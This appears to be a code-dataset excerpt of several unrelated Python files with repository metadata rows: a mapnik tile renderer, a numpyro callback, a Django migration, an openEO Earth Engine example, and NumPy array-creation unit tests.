"""for id in order_to_votes:
order = order_id_to_order[id]
votes = order_to_votes[id]
for vote in votes:
diff = abs(order['timestamp'] - vote['timestamp'])
print diff"""
print "{} total orders.".format(total_orders)
print "{} orphan orders.".format(orphan_orders)
print "{} matched orders.".format(matched_orders)
print "{} success rate".format(matched_orders/float(total_orders))
| 29.103448 | 124 | 0.596919 | 535 | 4,220 | 4.502804 | 0.201869 | 0.037775 | 0.041096 | 0.031133 | 0.163553 | 0.092154 | 0.046492 | 0.046492 | 0.046492 | 0.046492 | 0 | 0.011878 | 0.261848 | 4,220 | 144 | 125 | 29.305556 | 0.761477 | 0.048578 | 0 | 0.145833 | 0 | 0 | 0.118397 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010417 | 0.052083 | null | null | 0.072917 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2e31be5d18f3fe2b7f52f4dcf1298049713e2b3 | 7,008 | py | Python | server/localfinance/mapnik_render.py | regardscitoyens/nosfinanceslocales | b7b1a8c464153ea7a1cc4864aac0b3e67dc0be7e | [
"MIT"
] | 1 | 2015-03-18T08:07:08.000Z | 2015-03-18T08:07:08.000Z | server/localfinance/mapnik_render.py | regardscitoyens/nosfinanceslocales | b7b1a8c464153ea7a1cc4864aac0b3e67dc0be7e | [
"MIT"
] | 3 | 2017-01-05T20:00:59.000Z | 2017-04-14T19:31:38.000Z | server/localfinance/mapnik_render.py | regardscitoyens/nosfinanceslocales | b7b1a8c464153ea7a1cc4864aac0b3e67dc0be7e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from math import pi,sin,log,exp,atan
import os
from Queue import Queue
import threading
import json
import mapnik
DEG_TO_RAD = pi/180
RAD_TO_DEG = 180/pi
# Default number of rendering threads to spawn, should be roughly equal to number of CPU cores available
NUM_THREADS = 4
def minmax (a,b,c):
a = max(a,b)
a = min(a,c)
return a
class GoogleProjection:
def __init__(self,levels=18):
self.Bc = []
self.Cc = []
self.zc = []
self.Ac = []
c = 256
for d in range(0,levels):
e = c/2;
self.Bc.append(c/360.0)
self.Cc.append(c/(2 * pi))
self.zc.append((e,e))
self.Ac.append(c)
c *= 2
def fromLLtoPixel(self,ll,zoom):
d = self.zc[zoom]
e = round(d[0] + ll[0] * self.Bc[zoom])
f = minmax(sin(DEG_TO_RAD * ll[1]),-0.9999,0.9999)
g = round(d[1] + 0.5*log((1+f)/(1-f))*-self.Cc[zoom])
return (e,g)
def fromPixelToLL(self,px,zoom):
e = self.zc[zoom]
f = (px[0] - e[0])/self.Bc[zoom]
g = (px[1] - e[1])/-self.Cc[zoom]
h = RAD_TO_DEG * ( 2 * atan(exp(g)) - 0.5 * pi)
return (f,h)
class RenderThread:
def __init__(self, tile_dir, xmlmap, q, printLock, maxZoom, fields=None, layer_id=None):
self.tile_dir = tile_dir
self.q = q
self.render_size = 256
self.m = mapnik.Map(self.render_size, self.render_size)
self.g = mapnik.Grid(self.render_size, self.render_size)
self.printLock = printLock
# Load style XML
mapnik.load_map_from_string(self.m, xmlmap)
# Obtain <Map> projection
self.prj = mapnik.Projection(self.m.srs)
# Projects between tile pixel co-ordinates and LatLong (EPSG:4326)
self.tileproj = GoogleProjection(maxZoom+1)
self.layer_id = layer_id
self.fields = fields or []
def get_bbox(self, x, y, z):
# Calculate pixel positions of bottom-left & top-right
p0 = (x * self.render_size, (y + 1) * self.render_size)
p1 = ((x + 1) * self.render_size, y * self.render_size)
# Convert to LatLong (EPSG:4326)
l0 = self.tileproj.fromPixelToLL(p0, z);
l1 = self.tileproj.fromPixelToLL(p1, z);
# Convert to map projection (e.g. mercator co-ords EPSG:900913)
c0 = self.prj.forward(mapnik.Coord(l0[0],l0[1]))
c1 = self.prj.forward(mapnik.Coord(l1[0],l1[1]))
# Bounding box for the tile
if hasattr(mapnik,'mapnik_version') and mapnik.mapnik_version() >= 800:
return mapnik.Box2d(c0.x,c0.y, c1.x,c1.y)
else:
return mapnik.Envelope(c0.x,c0.y, c1.x,c1.y)
def render_tile(self, tile_uri, x, y, z):
bbox = self.get_bbox(x, y, z)
self.m.resize(self.render_size, self.render_size)
self.m.zoom_to_box(bbox)
self.m.buffer_size = 128
# Render image with default Agg renderer
im = mapnik.Image(self.render_size, self.render_size)
mapnik.render(self.m, im)
im.save(tile_uri, 'png256')
def render_grid(self, grid_uri, x, y, z):
bbox = self.get_bbox(x, y, z)
self.m.resize(self.render_size, self.render_size)
self.m.zoom_to_box(bbox)
self.m.buffer_size = 128
# Render grid
utf_grids = mapnik.render_grid(self.m, self.layer_id, fields=self.fields)
if not utf_grids['keys'] or utf_grids['keys'] == [""]:
utf_grids = ''
json.dump(utf_grids, open(grid_uri, 'w'), encoding='utf-8')
def loop(self):
while True:
#Fetch a tile from the queue and render it
r = self.q.get()
if (r == None):
self.q.task_done()
break
else:
(name, tile_uri, x, y, z) = r
exists= ""
if os.path.isfile(tile_uri):
exists= "exists"
else:
self.render_tile(tile_uri, x, y, z)
bytes=os.stat(tile_uri)[6]
empty= ''
if bytes == 103:
empty = " Empty Tile "
grid_uri = tile_uri.replace('.png', '.grid.json')
if not os.path.isfile(grid_uri):
print "grid", name, ":", z, x, y, exists, empty
self.render_grid(grid_uri, x, y, z)
self.printLock.acquire()
print name, ":", z, x, y, exists, empty
self.printLock.release()
self.q.task_done()
def render_tiles(bbox, xmlmap, tile_dir, minZoom=1,maxZoom=18, name="unknown", num_threads=NUM_THREADS, tms_scheme=False, fields=None, layer_id=0):
print "render_tiles(",bbox, tile_dir, minZoom,maxZoom, name,")"
# Launch rendering threads
queue = Queue(32)
printLock = threading.Lock()
renderers = {}
for i in range(num_threads):
renderer = RenderThread(tile_dir, xmlmap, queue, printLock, maxZoom, fields=fields, layer_id=layer_id)
render_thread = threading.Thread(target=renderer.loop)
render_thread.start()
#print "Started render thread %s" % render_thread.getName()
renderers[i] = render_thread
if not os.path.isdir(tile_dir):
os.mkdir(tile_dir)
gprj = GoogleProjection(maxZoom+1)
ll0 = (bbox[0],bbox[3])
ll1 = (bbox[2],bbox[1])
for z in range(minZoom,maxZoom + 1):
px0 = gprj.fromLLtoPixel(ll0,z)
px1 = gprj.fromLLtoPixel(ll1,z)
# check if we have directories in place
zoom = "%s" % z
if not os.path.isdir(tile_dir + zoom):
os.mkdir(tile_dir + zoom)
for x in range(int(px0[0]/256.0),int(px1[0]/256.0)+1):
# Validate x co-ordinate
if (x < 0) or (x >= 2**z):
continue
# check if we have directories in place
str_x = "%s" % x
if not os.path.isdir(tile_dir + zoom + '/' + str_x):
os.mkdir(tile_dir + zoom + '/' + str_x)
for y in range(int(px0[1]/256.0),int(px1[1]/256.0)+1):
# Validate x co-ordinate
if (y < 0) or (y >= 2**z):
continue
# flip y to match OSGEO TMS spec
if tms_scheme:
str_y = "%s" % ((2**z-1) - y)
else:
str_y = "%s" % y
tile_uri = tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'
# Submit tile to be rendered into the queue
t = (name, tile_uri, x, y, z)
try:
queue.put(t)
except KeyboardInterrupt:
raise SystemExit("Ctrl-c detected, exiting...")
# Signal render threads to exit by sending empty request to queue
for i in range(num_threads):
queue.put(None)
# wait for pending rendering jobs to complete
queue.join()
for i in range(num_threads):
renderers[i].join()
| 33.855072 | 147 | 0.550228 | 998 | 7,008 | 3.751503 | 0.249499 | 0.045406 | 0.05609 | 0.043269 | 0.210737 | 0.174145 | 0.142361 | 0.090812 | 0.05609 | 0.05609 | 0 | 0.032942 | 0.31992 | 7,008 | 206 | 148 | 34.019417 | 0.752623 | 0.125143 | 0 | 0.126667 | 0 | 0 | 0.02227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0.06 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2f00eca0637e25f52bd3d22e1622175e9673c10 | 509 | py | Python | numpyro/callbacks/history.py | ahmadsalim/numpyro | 015c80ddd24cf6bc89006fc3a70b424fecd09331 | [
"Apache-2.0"
] | 3 | 2020-08-25T14:31:08.000Z | 2020-08-26T02:23:08.000Z | numpyro/callbacks/history.py | ahmadsalim/numpyro | 015c80ddd24cf6bc89006fc3a70b424fecd09331 | [
"Apache-2.0"
] | null | null | null | numpyro/callbacks/history.py | ahmadsalim/numpyro | 015c80ddd24cf6bc89006fc3a70b424fecd09331 | [
"Apache-2.0"
] | 1 | 2020-09-11T10:08:27.000Z | 2020-09-11T10:08:27.000Z | from numpyro.callbacks import Callback
class History(Callback):
def __init__(self):
super().__init__()
self.training_history = []
self.validation_history = []
def on_train_begin(self, train_info):
self.training_history.append(train_info['loss'])
def on_train_step_end(self, step, train_info):
self.training_history.append(train_info['loss'])
def on_validation_end(self, val_step, val_info):
self.validation_history.append(val_info['loss'])
| 28.277778 | 56 | 0.693517 | 65 | 509 | 5.015385 | 0.338462 | 0.110429 | 0.174847 | 0.128834 | 0.319018 | 0.319018 | 0.319018 | 0.319018 | 0.319018 | 0.319018 | 0 | 0 | 0.192534 | 509 | 17 | 57 | 29.941176 | 0.793187 | 0 | 0 | 0.166667 | 0 | 0 | 0.023576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.083333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2f1809a81b3849b9b283b1345c6723243f151b9 | 515 | py | Python | src/web/migrations/0003_movie_mean_rate.py | ncthanhcs/backend | 3ce8a92363d6ab0e067188c95a636f84b179fa53 | [
"Apache-2.0"
] | null | null | null | src/web/migrations/0003_movie_mean_rate.py | ncthanhcs/backend | 3ce8a92363d6ab0e067188c95a636f84b179fa53 | [
"Apache-2.0"
] | null | null | null | src/web/migrations/0003_movie_mean_rate.py | ncthanhcs/backend | 3ce8a92363d6ab0e067188c95a636f84b179fa53 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.0.12 on 2020-06-30 08:31
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('web', '0002_auto_20200630_1111'),
]
operations = [
migrations.AddField(
model_name='movie',
name='mean_rate',
field=models.IntegerField(default=1, validators=[django.core.validators.MaxValueValidator(5), django.core.validators.MinValueValidator(0)]),
),
]
| 25.75 | 152 | 0.658252 | 57 | 515 | 5.859649 | 0.719298 | 0.08982 | 0.179641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0875 | 0.223301 | 515 | 19 | 153 | 27.105263 | 0.7475 | 0.08932 | 0 | 0 | 1 | 0 | 0.085653 | 0.049251 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c068c98c8f2c840e783be0738abfe5de3859c92 | 742 | py | Python | network-client/src/gmu/chord/MessageCache.py | danfleck/Class-Chord | 00d53a43e524d5202afd72b9205f3dcf8169c775 | [
"Apache-2.0"
] | 1 | 2015-09-11T03:07:08.000Z | 2015-09-11T03:07:08.000Z | network-client/src/gmu/chord/MessageCache.py | danfleck/Class-Chord | 00d53a43e524d5202afd72b9205f3dcf8169c775 | [
"Apache-2.0"
] | null | null | null | network-client/src/gmu/chord/MessageCache.py | danfleck/Class-Chord | 00d53a43e524d5202afd72b9205f3dcf8169c775 | [
"Apache-2.0"
] | null | null | null | '''
Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information.
Created on Apr 9, 2014
@author: dfleck
'''
class MessageCache(list):
'''
Holds a list of tuples (envelope, message)
'''
def __contains__(self, otherEnvelope):
#print("\n-- Message Cache Check -- ")
for value in self:
(envelope, message) = value
#print("MessageCache comparing: [%s][%s]" % (otherEnvelope['msgID'], envelope['msgID']))
if envelope['msgID'] == otherEnvelope['msgID']:
#print("Message Cache: TRUE\n -- ")
return True
#print("Message Cache: FALSE\n -- ")
return False
| 26.5 | 108 | 0.563342 | 79 | 742 | 5.240506 | 0.594937 | 0.086957 | 0.082126 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013566 | 0.304582 | 742 | 27 | 109 | 27.481481 | 0.78876 | 0.521563 | 0 | 0 | 0 | 0 | 0.030395 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6c14ea83d17a6d859ccb177813c51d84796b492b | 3,016 | py | Python | examples/gee_example.py | lforesta/openeo-python-client | d6cfc17f9693f6f6bf4a2ce60eac180ee9576543 | [
"Apache-2.0"
] | null | null | null | examples/gee_example.py | lforesta/openeo-python-client | d6cfc17f9693f6f6bf4a2ce60eac180ee9576543 | [
"Apache-2.0"
] | null | null | null | examples/gee_example.py | lforesta/openeo-python-client | d6cfc17f9693f6f6bf4a2ce60eac180ee9576543 | [
"Apache-2.0"
] | null | null | null | import openeo
import logging
import time
import json
from openeo.auth.auth_bearer import BearerAuth
logging.basicConfig(level=logging.INFO)
GEE_DRIVER_URL = "https://earthengine.openeo.org/v0.4"
OUTPUT_FILE = "/tmp/openeo_gee_output.png"
user = "group1"
password = "test123"
#connect with GEE backend
#session = openeo.session("nobody", GEE_DRIVER_URL)
#TODO update example
con = openeo.connect(GEE_DRIVER_URL, auth_type=BearerAuth, auth_options={"username": user, "password": password})
#Test Connection
print(con.list_processes())
print(con.list_collections())
print(con.describe_collection("COPERNICUS/S2"))
# Test Capabilities
cap = con.capabilities()
print(cap.version())
print(cap.list_features())
print(cap.currency())
print(cap.list_plans())
# Test Processes
datacube = con.imagecollection("COPERNICUS/S2")
datacube = datacube.filter_bbox(west=16.138916, south=48.138600, east=16.524124, north=48.320647, crs="EPSG:4326")
datacube = datacube.filter_daterange(extent=["2017-01-01T00:00:00Z", "2017-01-31T23:59:59Z"])
datacube = datacube.ndvi(nir="B4", red="B8A")
datacube = datacube.min_time()
print(json.dumps(datacube.graph, indent=2))
# Test Job
job = con.create_job(datacube.graph)
print(job.job_id)
print(job.start_job())
print (job.describe_job())
time.sleep(5)
job.download_results("/tmp/testfile")
# PoC JSON:
# {
# "process_graph":{
# "process_id":"stretch_colors",
# "args":{
# "imagery":{
# "process_id":"min_time",
# "args":{
# "imagery":{
# "process_id":"NDVI",
# "args":{
# "imagery":{
# "process_id":"filter_daterange",
# "args":{
# "imagery":{
# "process_id":"filter_bbox",
# "args":{
# "imagery":{
# "product_id":"COPERNICUS/S2"
# },
# "left":9.0,
# "right":9.1,
# "top":12.1,
# "bottom":12.0,
# "srs":"EPSG:4326"
# }
# },
# "from":"2017-01-01",
# "to":"2017-01-31"
# }
# },
# "red":"B4",
# "nir":"B8"
# }
# }
# }
# },
# "min": -1,
# "max": 1
# }
# },
# "output":{
# "format":"png"
# }
# }
| 29.568627 | 114 | 0.43435 | 262 | 3,016 | 4.862595 | 0.469466 | 0.035322 | 0.056515 | 0.062794 | 0.040816 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064385 | 0.428382 | 3,016 | 101 | 115 | 29.861386 | 0.674594 | 0.578581 | 0 | 0 | 0 | 0 | 0.150123 | 0.021329 | 0 | 0 | 0 | 0.009901 | 0 | 1 | 0 | false | 0.064516 | 0.16129 | 0 | 0.16129 | 0.354839 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6c1563fe85c2fd723de6d84ea7594c977af3340c | 28,165 | py | Python | src/PythonUnitTests/ArrayCreationTests.py | Quansight-Labs/numpy.net | cfa063a935a562e97deb9a20b2d0c41ab00d3a4b | [
"BSD-3-Clause"
] | 59 | 2019-01-20T19:43:05.000Z | 2022-03-26T06:08:51.000Z | src/PythonUnitTests/ArrayCreationTests.py | Quansight-Labs/numpy.net | cfa063a935a562e97deb9a20b2d0c41ab00d3a4b | [
"BSD-3-Clause"
] | 21 | 2019-06-06T17:45:01.000Z | 2022-03-30T10:37:24.000Z | src/PythonUnitTests/ArrayCreationTests.py | Quansight-Labs/numpy.net | cfa063a935a562e97deb9a20b2d0c41ab00d3a4b | [
"BSD-3-Clause"
] | 7 | 2019-05-12T21:06:18.000Z | 2022-02-13T12:23:23.000Z | import unittest
import numpy as np
import time as tm
import matplotlib.pyplot as plt
from nptest import nptest
import operator
class ArrayCreationTests(unittest.TestCase):
def test_PrintVersionString(self):
print(np.__version__)
def test_simpleShape_1(self):
a=np.array([1,2,3])
x=a.shape[0]
print(x)
def test_Slice3x2x2_1(self):
x = np.arange(12).reshape(3, 2, 2);
y = x[1:];
y *= 99;
print(x)
def test_asfarray_1(self):
a = np.asfarray([2, 3])
print(a)
b = np.asfarray([2, 3], dtype='float')
print(b)
c = np.asfarray([2, 3], dtype='int8')
print(c)
def test_asmatrix_1(self):
x = np.array([[1, 2], [3, 4]])
m = np.asmatrix(x)
x[0,0] = 5
print(m)
def test_copy_1(self):
x = np.array([1, 2, 3])
y = x
z = np.copy(x)
# Note that, when we modify x, y changes, but not z:
x[0] = 10
print(x[0] == y[0])
#True
print(x[0] == z[0])
#False
def test_linspace_1(self):
a = np.linspace(2.0, 3.0, num=5)
print(a)
b = np.linspace(2.0, 3.0, num=5, endpoint=False)
print(b)
c = np.linspace(2.0, 3.0, num=5, retstep=True)
print(c)
def test_linspace_2(self):
a = np.linspace(2+1.3j, 3+5.6j, num=5, dtype=np.complex)
print(a)
b = np.linspace(2.0, 3.0, num=5, endpoint=False)
print(b)
c = np.linspace(2.0, 3.0, num=5, retstep=True)
print(c)
def test_linspace_3(self):
a = np.linspace(2.0, 3.0, num=5, dtype= np.longlong)
print(a)
b = np.linspace(2.0, 3.0, num=5, endpoint=False, dtype= np.longlong)
print(b)
c = np.linspace(2.0, 3.0, num=5, retstep=True, dtype= np.longlong)
print(c)
def test_logspace_1(self):
a = np.logspace(2.0, 3.0, num=4)
print(a)
b = np.logspace(2.0, 3.0, num=4, endpoint=False)
print(b)
c = np.logspace(2.0, 3.0, num=4, base=2.0)
print(c)
def test_logspace_2(self):
a = np.logspace(2, 3, num=4, dtype=np.longlong)
print(a)
b = np.logspace(2.0, 3.0, num=4, endpoint=False, dtype=np.longlong)
print(b)
c = np.logspace(2.0, 3.0, num=4, base=2.0, dtype=np.longlong)
print(c)
def test_geomspace_1(self):
a = np.geomspace(1, 1000, num=4)
print(a)
b = np.geomspace(1, 1000, num=3, endpoint=False)
print(b)
c = np.geomspace(1, 1000, num=4, endpoint=False)
print(c)
d = np.geomspace(1, 256, num=9)
print(d)
def test_meshgrid_1(self):
nx = 3
ny = 2
x = np.linspace(0, 1, nx)
y = np.linspace(0, 1, ny)
xv = np.meshgrid(x)
print(xv)
print("************")
xv, yv = np.meshgrid(x, y)
print(xv)
print(yv)
print("************")
xv, yv = np.meshgrid(x, y, sparse=True)
print(xv)
print(yv)
print("************")
x = np.arange(-5, 5, 1)
y = np.arange(-5, 5, 1)
xx, yy = np.meshgrid(x, y, sparse=True)
print(xx)
print(yy)
print("************")
def test_meshgrid_1_longlong(self):
nx = 3
ny = 2
x = np.linspace(0, 100, nx, dtype=np.longlong)
y = np.linspace(0, 100, ny, dtype=np.longlong)
xv = np.meshgrid(x)
print(xv)
print("************")
xv, yv = np.meshgrid(x, y)
print(xv)
print(yv)
print("************")
xv, yv = np.meshgrid(x, y, sparse=True)
print(xv)
print(yv)
print("************")
x = np.arange(-5, 5, 1, dtype=np.longlong)
y = np.arange(-5, 5, 1, dtype=np.longlong)
xx, yy = np.meshgrid(x, y, sparse=True)
print(xx)
print(yy)
print("************")
def test_meshgrid_2(self):
nx = 3
ny = 2
nz = 2
x = np.linspace(0, 1, nx)
y = np.linspace(4, 5, ny)
z = np.linspace(8, 9, nz)
xv, yv, zv = nptest.meshgrid(x, y, z, indexing='ij')
print(xv)
print(yv)
print(zv)
print("************")
xv, yv, zv = np.meshgrid(x, y,z, sparse=True)
print(xv)
print(yv)
print(zv)
print("************")
x = np.arange(-2, 2, 1)
y = np.arange(-2, 2, 1)
z = np.arange(2, -2, -1)
xx, yy, zz = np.meshgrid(x, y, z, copy=True)
print(xx)
print(yy)
print(zz)
print("************")
def test_OneDimensionalArray(self):
l = [12.23, 13.32, 100, 36.32]
print("Original List:",l)
a = np.array(l)
print("One-dimensional numpy array: ",a)
print(a.shape)
print(a.strides)
def test_arange_2to11(self):
a = np.arange(2, 11, 1, dtype = np.int8)
print(a)
print(a.shape)
print(a.strides)
def test_arange_2to11_double(self):
a = np.arange(2.5, 11.5, 2)
print(a)
print(a.shape)
print(a.strides)
def test_arange_2to11_float(self):
a = np.arange(2.5, 37.7, 2.2, dtype=np.float32)
print(a)
print(a.shape)
print(a.strides)
def test_arange_reshape_33(self):
a = np.arange(2, 11).reshape(3,3)
print(a)
print(a.shape)
print(a.strides)
def test_arange_reshape_53(self):
a = np.arange(0, 15).reshape(5,3)
print(a)
print(a.shape)
print(a.strides)
def test_reverse_array(self):
x = np.arange(0,40)
print("Original array:")
print(x)
print("Reverse array:")
x = x[::-1]
print(x)
y = x + 100
print(y)
z = x.reshape(5,-1)
print(z)
def test_1_OnBorder_0Inside(self):
x = np.ones((15,15), dtype= np.double)
print("Original array:")
print(x)
print(x.shape)
print(x.strides)
print("1 on the border and 0 inside in the array")
x[1:-1,1:-1] = 0
print(x)
print(x.shape)
print(x.strides)
def test_1_OnBorder_0Inside_2(self):
x = np.arange(0,225, dtype= np.double).reshape(15,15)
print("Original array:")
print(x)
print(x.shape)
print(x.strides)
print("1 on the border and 0 inside in the array")
x = x[1:-1,1:-1];
print(x)
print(x.shape)
print(x.strides)
def test_checkerboard_1(self):
x = np.ones((3,3))
print("Checkerboard pattern:")
x = np.zeros((8,8),dtype=int)
x[1::2,::2] = 1
x[::2,1::2] = 1
print(x)
def test_F2C_1(self):
fvalues = [0, 12, 45.21, 34, 99.91]
F = np.array(fvalues, dtype=np.float32)
print("Values in Fahrenheit degrees:")
print(F)
print("Values in Centigrade degrees:")
C = 5*F/9 - 5*32/9;
print(C)
def test_RealImage_float_1(self):
x = np.array([1.0,1.5,1.74,1.9])
y = np.array([0.1,0.3,0.5,0.7])
print("Original array:x ",x)
print("Original array:y ",y)
print("Real part of the array:")
print(x.real)
print(y.real)
print("Imaginary part of the array:")
print(x.imag)
print(y.imag)
def test_ArrayStats_1(self):
x = np.array([1,2,3], dtype=np.float64)
print("Size of the array: ", x.size)
print("Length of one array element in bytes: ", x.itemsize)
print("Total bytes consumed by the elements of the array: ", x.nbytes)
def test_ndarray_flatten(self):
x = np.arange(0.73,25.73, dtype= np.double).reshape(5,5)
y = x.flatten()
print(x)
print(y)
y = x.flatten(order='F')
print(y)
y = x.flatten(order='K')
print(y)
def test_ndarray_flatten_longlong(self):
x = np.arange(7,32, dtype= np.longlong).reshape(5,5)
y = x.flatten()
print(x)
print(y)
y = x.flatten(order='F')
print(y)
y = x.flatten(order='K')
print(y)
def test_ndarray_byteswap(self):
x = np.arange(32,64, dtype= np.int16)
print(x)
y = x.byteswap(True)
print(y)
x = np.arange(32,64, dtype= np.int32)
print(x)
y = x.byteswap(True)
print(y)
x = np.arange(32,64, dtype= np.int64)
print(x)
y = x.byteswap(True)
print(y)
def test_ndarray_view(self):
x = np.arange(256+32,256+64, dtype= np.int16)
print(x)
print(x.shape)
print(x.dtype)
y = x.view(np.uint8)
print(y)
print(y.shape)
print(y.dtype)
print("modifying data")
y[1] = 99
print(x)
def test_ndarray_view_1(self):
x = np.arange(0,32, dtype= np.int16).reshape(2,-1,4)
print("X")
print(x)
print(x.shape)
y = x.T
print("Y")
print(y)
print(y.shape)
z = y.view()
z[0] = 99
print("Z")
print(z)
print(z.shape)
print("X")
print(x)
print("Y")
print(y)
def test_ndarray_view2(self):
x = np.arange(256+32,256+64, dtype= np.int16)
print(x)
print(x.shape)
print(x.dtype)
y = x.view(np.uint32)
print(y)
print(y.shape)
print(y.dtype)
print("modifying data")
y[1] = 99
y[5] = 88
print(y)
print(x)
def test_ndarray_view2_reshape(self):
x = np.arange(65470+32,65470+64, dtype= np.uint16).reshape(2,2,-1)
print(x)
print(x.shape)
print(x.dtype)
z = x[:,:,[2]]
print(z)
y = z.view().reshape(-1);
print(y)
print(y.shape)
print(y.dtype)
def test_ndarray_view3(self):
x = np.arange(256+32,256+64, dtype= np.int16)
print(x)
print(x.shape)
print(x.dtype)
y = x.view(np.uint64)
print(y)
print(y.shape)
print(y.dtype)
print("modifying data")
y[1] = 99
y[5] = 88
print(y)
print(x)
def test_ndarray_delete1(self):
x = np.arange(0,32, dtype= np.int16).reshape(8,4)
print("X")
print(x)
print(x.shape)
y = np.delete(x, 0, axis=1)
y[1] = 99
print("Y")
print(y)
print(y.shape)
print("X")
print(x)
def test_ndarray_delete2(self):
x = np.arange(0,32, dtype= np.int16)
print("X")
print(x)
print(x.shape)
y = np.delete(x, 1,0)
print("Y")
print(y)
print(y.shape)
print("X")
print(x)
def test_ndarray_delete3(self):
x = np.arange(0,32, dtype= np.int16).reshape(8,4)
print("X")
print(x)
print(x.shape)
mask = np.ones_like(x, dtype=np.bool)
mask[:,[0]] = False
print(mask)
y = x[mask].reshape(8,3)
print("Y")
print(y)
print(y.shape)
print("X")
print(x)
def test_ndarray_unique_1(self):
x = np.array([1,2,3,1,3,4,5,4,4]);
print("X")
print(x)
uvalues, indexes, inverse, counts = np.unique(x, return_counts = True, return_index=True, return_inverse=True);
print("uvalues")
print(uvalues)
print("indexes")
print(indexes)
print("inverse")
print(inverse)
print("counts")
print(counts)
def test_ndarray_unique_2(self):
x = np.array([1,2,3,1,98,97,96,94,3,4,5,4,4,1,9,6,9,11,23,9,5,0,11,12]).reshape(6,4);
print("X")
print(x)
uvalues, indexes, inverse, counts = np.unique(x, return_counts = True, return_index=True, return_inverse=True, axis=0);
print("uvalues")
print(uvalues)
print("indexes")
print(indexes)
print("inverse")
print(inverse)
print("counts")
print(counts)
uvalues, indexes, inverse, counts = np.unique(x, return_counts = True, return_index=True, return_inverse=True, axis=1);
print("uvalues")
print(uvalues)
print("indexes")
print(indexes)
print("inverse")
print(inverse)
print("counts")
print(counts)
def test_ndarray_where_1(self):
x = np.array([1,2,3,1,3,4,5,4,4]).reshape(3,3)
print("X")
print(x)
y = np.where(x == 3)
print("Y")
print(y)
def test_ndarray_where_2(self):
x = np.array([1,2,3,1,3,4,5,4,4], dtype=np.int32).reshape(3,3)
print("X")
print(x)
y = np.where(x == 3)
print("Y")
print(y)
z = x[y]
print("Z")
print(z)
def test_ndarray_where_3(self):
x = np.arange(0, 1000, dtype=np.int32).reshape(-1,10)
#print("X")
#print(x)
y = np.where(x % 10 == 0)
#print("Y")
#print(y)
z = x[y]
print("Z")
print(z)
def test_ndarray_where_4(self):
x = np.arange(0, 3000000, dtype=np.int32)
#print("X")
#print(x)
y = np.where(x % 7 == 0)
print("Y")
print(y)
z = x[y]
m = np.mean(z);
print("M")
print(m)
def test_ndarray_where_5(self):
a = np.arange(10)
b = np.where(a < 5, a, 10*a)
print(b)
a = np.array([[0, 1, 2], [0, 2, 4], [0, 3, 6]])
b = np.where(a < 4, a, -1) # -1 is broadcast
print(b)
c = np.where([[True, False], [True, True]],
[[1, 2], [3, 4]],
[[9, 8], [7, 6]])
print(c)
def test_ndarray_unpackbits_1(self):
x = np.arange(0,12, dtype=np.uint8).reshape(3,-1)
print("X")
print(x)
y = np.unpackbits(x, 1);
print("Y")
print(y)
z = np.packbits(y, 1)
print("Z")
print(z)
def test_arange_slice_1(self):
a = np.arange(0, 1024, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
b = a[:,:,122]
print("B")
print(b)
print(b.shape)
print(b.strides)
c = a[:,:,[122]]
print("C")
print(c)
print(c.shape)
print(c.strides)
c2 = np.arange(0,8, dtype=np.int16).reshape(2,4,1);
print("C2")
print(c2)
print(c2.shape)
print(c2.strides)
d = a[:,:,[122,123]]
print("D")
print(d)
print(d.shape)
print(d.strides)
def test_arange_slice_2(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
# b has unexpected strides. If a copy from A is made first
b = a[:,:,[2]]
print("B")
print(b)
print(b.shape)
print(b.strides)
